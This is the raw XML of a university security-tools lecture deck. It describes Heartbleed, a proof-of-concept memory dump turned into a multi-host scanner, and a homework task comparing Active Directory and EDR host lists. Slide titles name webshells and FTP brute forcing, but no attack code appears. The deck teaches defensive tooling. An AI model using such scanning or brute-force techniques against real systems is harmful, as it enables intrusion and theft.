                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> completed training: " + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print("Users still need to complete training: " + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remaining_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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83919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A69-AB29-314D-B29C-36017E70C9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B4051E-1244-E24B-B9FD-3859BF37D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10868"/>
            <a:ext cx="7701034" cy="4521708"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169089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detection script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>April 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 2014 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> public disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Heatbeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> used to test and keep secure connections alive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code didn’t do proper bounds checking, so the exploit would trigger the victim host to respond to a malformed heartbeat request with whatever was in the allocated memory buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could be nothing, could be gibberish, could be passwords and SSL private keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Within ~ 2 hours of the public announcement exploit code/code to check if a system is vulnerable was released</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NSE, vulnerability scan plugins, intrusion prevention/detection signatures, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1892793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13AC-5BCB-9D4B-B7D3-3084DDED6FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Homework #4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA31C6E-65C8-B247-B0FA-04326505EF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are in the middle of deploying an EDR (endpoint detection and response) solution to your organization and you want to compare your list of all systems in your Active Directory (AD) environment to the list of systems that are registered with your EDR tool’s management server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0305FC8E-E471-2344-895C-6E629C029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74" y="3429000"/>
            <a:ext cx="3771900" cy="1803400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E947F9-9306-634D-8F78-E3D4AB219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726" y="5803963"/>
            <a:ext cx="5943600" cy="687705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5053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detection script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Written to show POC of the exploit by dumping 64k of data returned from victim host with malformed heartbeat request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Great for checking a single host but how can we quickly scan all potentially vulnerable hosts?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180404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Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> detection script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Add code to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open a file with a lists of hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Process that list with a for loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Replace the data dump with a shorter message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411324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Adjacency.thmx</Template>
  <TotalTime>2647</TotalTime>
  <Words>3041</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>453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vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Adjacency</vt:lpstr>
      <vt:lpstr>Before we begin</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Information Security Tools</vt:lpstr>
      <vt:lpstr>Week 7</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>So what?  Sometimes…</vt:lpstr>
      <vt:lpstr>Heartbleed detection script</vt:lpstr>
      <vt:lpstr>Heartbleed detection script</vt:lpstr>
      <vt:lpstr>Heartbleed detection script</vt:lpstr>
      <vt:lpstr>Heartbleed detection script</vt:lpstr>
      <vt:lpstr>Heartbleed detection script</vt:lpstr>
      <vt:lpstr>Heartbleed detection script</vt:lpstr>
      <vt:lpstr>Processing lots of data quickly</vt:lpstr>
      <vt:lpstr>Processing lots of data quickly</vt:lpstr>
      <vt:lpstr>Processing lots of data quickly</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>PHP create_function()</vt:lpstr>
      <vt:lpstr>PHP eval()</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>Analyzing Suspicious Code</vt:lpstr>
      <vt:lpstr>PHP – Webshell example</vt:lpstr>
      <vt:lpstr>PHP - Webshell</vt:lpstr>
      <vt:lpstr>China Chopper</vt:lpstr>
      <vt:lpstr>More malicious code</vt:lpstr>
      <vt:lpstr>More malicious code</vt:lpstr>
      <vt:lpstr>More malicious code</vt:lpstr>
      <vt:lpstr>Yet another example</vt:lpstr>
      <vt:lpstr>The Case of the Perl ASCII Art…</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>What if…</vt:lpstr>
      <vt:lpstr>Hmmm….</vt:lpstr>
      <vt:lpstr>DIY Brute Forcing</vt:lpstr>
      <vt:lpstr>Wrong Password</vt:lpstr>
      <vt:lpstr>Pseudocode </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>badpassword = </vt:lpstr>
      <vt:lpstr>Exercise: Anonymous FTP</vt:lpstr>
      <vt:lpstr>ftplib</vt:lpstr>
      <vt:lpstr>Anonymous FTP Checking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>FTP Brute Force</vt:lpstr>
      <vt:lpstr>FTP Brute Force</vt:lpstr>
      <vt:lpstr>FTP Brute Force</vt:lpstr>
      <vt:lpstr>FTP Brute Force</vt:lpstr>
      <vt:lpstr>How can we brute force</vt:lpstr>
      <vt:lpstr>Some Python/Pseudocode </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> # brute force code here</vt:lpstr>
      <vt:lpstr>Final output</vt:lpstr>
      <vt:lpstr>List Comparison</vt:lpstr>
      <vt:lpstr>Compare the Lists – Who’s Left?</vt:lpstr>
      <vt:lpstr>Compare the Lists – Who’s Left?</vt:lpstr>
      <vt:lpstr>Compare  List of remaining</vt:lpstr>
      <vt:lpstr>Slightly Different Formats</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Homework #4</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Tools</dc:title>
  <dc:creator>Kevin Shivers</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>200</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-07T03:18:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-07T19:07:07Z</dcterms:modified>
</cp:coreProperties>
</file>